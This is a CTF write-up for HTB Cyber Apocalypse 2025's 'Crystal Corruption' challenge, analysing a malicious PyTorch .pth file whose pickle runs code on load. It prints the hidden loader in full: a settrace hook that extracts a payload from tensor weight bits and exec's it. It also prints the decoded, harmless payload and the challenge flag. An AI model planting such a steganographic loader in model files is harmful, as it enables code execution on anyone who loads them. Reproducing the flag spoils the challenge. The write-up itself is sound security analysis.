Crystal Corruption

Crystal Corruption

Tags
Machine Learning
Created
Apr 2, 2025
CTF
CyberApocalypse 2025
This was the second Machine Learning challenge from HTB’s cyber apocalypse CTF and probably the one I enjoyed the most, in fact we are given a resnet18.pth and when we load it in the same way as the previous challenge we get immediately pwned, wow
Connecting to 127.0.0.1 Delivering payload to 127.0.0.1 Executing payload on 127.0.0.1 You have been pwned!
This is a very plausible exploit… too much plausible
Fortunately it’s just a CTF, so I started to look into pytorch source code and I found that .pth is basically just a wrapped pickle
I never fully understood how pickle worked until this challenge and I was amazed, it basically creates bytecode from a file and sends it to the interpreter. Now cool enough there is also a pure python implementation besides the C one in python.
I replaced the default pickle class with a custom one copy-pasted from python source, I added a few prints and I discovered that an exec is called with the following args
import sys import torch def stego_decode(tensor, n=3): import struct import hashlib import numpy bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8)) payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes() (size, checksum) = struct.unpack("i 64s", payload[:68]) message = payload[68:68+size] return message def call_and_return_tracer(frame, event, arg): global return_tracer global stego_decode def return_tracer(frame, event, arg): if torch.is_tensor(arg): payload = stego_decode(arg.data.numpy(), n=3) if payload is not None: sys.settrace(None) exec(payload.decode("utf-8")) if event == "call" and frame.f_code.co_name == "_rebuild_tensor_v2": frame.f_trace_lines = False return return_tracer sys.settrace(call_and_return_tracer)
It is a payload runner, so given that I am more a dymaic analysis kind of guy I actually replaced the tunner with a custom one that prints the decoded payload before evaluating it
PAYLOAD = """ import sys import torch def stego_decode(tensor, n=3): import struct import hashlib import numpy bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8)) payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes() (size, checksum) = struct.unpack("i 64s", payload[:68]) message = payload[68:68+size] return message def call_and_return_tracer(frame, event, arg): global return_tracer global stego_decode def return_tracer(frame, event, arg): if torch.is_tensor(arg): payload = stego_decode(arg.data.numpy(), n=3) if payload is not None: sys.settrace(None) print(payload) exec(payload.decode("utf-8")) if event == "call" and frame.f_code.co_name == "_rebuild_tensor_v2": frame.f_trace_lines = False return return_tracer sys.settrace(call_and_return_tracer)"""
replaced pickle function loading
def load_reduce(self): stack = self.stack args = stack.pop() func = stack[-1] if func.__name__ == 'exec': print(func.__name__) print(args) stack[-1] = exec(PAYLOAD) else: stack[-1] = func(*args)
and here we go with the decoded payload
import os def exploit(): connection = f"Connecting to 127.0.0.1" payload = f"Delivering payload to 127.0.0.1" result = f"Executing payload on 127.0.0.1" print(connection) print(payload) print(result) print("You have been pwned!") hidden_flag = "HTB{n3v3r_tru5t_p1ckl3_m0d3ls}" exploit()